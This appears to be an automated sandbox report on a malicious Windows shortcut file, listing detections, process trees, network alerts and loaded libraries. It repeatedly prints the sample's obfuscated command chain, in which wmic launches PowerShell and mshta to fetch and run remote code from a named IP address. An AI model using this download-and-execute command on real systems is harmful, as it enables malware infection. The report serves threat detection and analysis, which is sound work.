Windows Analysis Report
6G4au3vWsI.lnk

Overview

General Information

Sample name: 6G4au3vWsI.lnk (renamed because the original name is a hash value)
Original sample name: 2b4f800413a890176ebfec3ccc57fcbb.lnk
Analysis ID: 1569818
MD5: 2b4f800413a890176ebfec3ccc57fcbb
SHA1: 2411ba93cc9bfbc4498faf4b156d0fbfaefd03ca
SHA256: 9c9e8ac1e4fa6cd293e72c02e35417042e55ee3ee70a4460b0fce1d320e183c5
Tags: lnk, user-abuse_ch

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • WMIC.exe (PID: 7384 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7488 cmdline: powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell - MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mshta.exe (PID: 7652 cmdline: "C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 6552 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik, CommandLine: "C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik, ProcessId: 7652, ProcessName: mshta.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -", ProcessId: 7384, ProcessName: WMIC.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -, CommandLine: powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 7384, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -, ProcessId: 7488, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6552, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T10:27:48.742769+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49707 | 80.76.51.231 | 443 | TCP


AV Detection

Source: https://80.76.51.231/Samarik/ | Avira URL Cloud: Label: malware
Source: https://80.76.51.231/Samarik | Avira URL Cloud: Label: malware
Source: https://80.76.51.231/Samarik... | Avira URL Cloud: Label: malware
Source: 6G4au3vWsI.lnk | ReversingLabs: Detection: 26%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.0% probability
Source: 6G4au3vWsI.lnk | Joe Sandbox ML: detected
Source: Joe Sandbox View | ASN Name: CLOUDCOMPUTINGDE CLOUDCOMPUTINGDE
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49707 -> 80.76.51.231:443
Source: unknown | TCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712

System Summary

Source: WMIC.exe, 00000001.00000002.1400068742.0000015CD36D0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"C:\Users\user\Desktop\6G4au3vWsI.lnkWinsta0\DefaultH@wmemstr_727161a1-3
Source: 6G4au3vWsI.lnk | LNK file: process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A15F80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A2CEA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A1DFE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A3D3E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A1E318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A1EAAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF887A1BA99
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine | Classification label: mal96.evad.winLNK@9/11@0/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osbov1la.0ms.ps1
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wbem\WMIC.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 6G4au3vWsI.lnk | ReversingLabs: Detection: 26%
Source: unknown | Process created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: 6G4au3vWsI.lnk | LNK file: ..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000006.00000002.1464128230.00000221F4FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb8* source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDBJn source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\Z:\syscalls\amsi64_7668.amsi.csve.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F5012000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.1464128230.00000221F507B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F5323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb2 source: powershell.exe, 00000006.00000002.1464128230.00000221F5012000.00000004.00000020.00020000.00000000.sdmp
